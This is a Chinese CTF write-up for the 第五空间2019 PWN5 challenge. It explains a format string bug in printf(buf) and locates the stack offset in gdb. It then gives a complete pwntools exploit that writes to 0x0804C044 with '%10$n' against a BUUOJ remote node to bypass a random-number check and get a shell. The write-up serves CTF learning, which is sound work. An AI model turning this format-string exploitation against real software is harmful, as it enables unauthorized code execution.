第五空间2019 决赛]PWN5
自己输入一个数和随机数作比较,相等即get shell,是一个随机数绕过的题目。
printf(buf),一个很明显的格式化字符串漏洞。详情:CTFer成长日记11:格式化字符串漏洞的原理与利用 - 知乎 (zhihu.com)(文章里面printf函数参数地址比ebp还高就有点奇怪,其他的我觉着挺有用的)
那这里需要修改的就是&dword_804C044的值,现在就是把printf第一个参数,也就是找输入的字符串会保存在哪个位置。
gdb调试一下,输入this is
可以看到刚刚输入的字符串对应两个地址 ,左边的d094存放的是字符串真正的地址,就是d0b8存放着字符串。按道理printf第一个参数应该就是d094了,但是前面还出现了一次这个函数,所以真正的第一个参数地址应该是d090.
下一步我们就要计算出%k$n中k的值,d0b8-d090=40,32位就是40/4=10。这样就是指定修改d0b8的值了。
exp:
from pwn import *
#r=process('./pwn1')
r = remote('node4.buuoj.cn',26381)
r.recvuntil('name:')
payload = p32(0x0804C044) +b'%10$n'
r.sendline(payload)
r.recvuntil('passwd:')
payload=b'4'
#gdb.attach(r)
r.sendline(payload)
#pause()
r.interactive()
至于为什么是输入4,刚好%n前输入了一个地址就是四个字节的,那么对应d0b8中的地址就会被赋值为4.然后0x0804C044就是&dword_804C044的地址了。
各位大佬如果有发现什么错误,还望指出。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
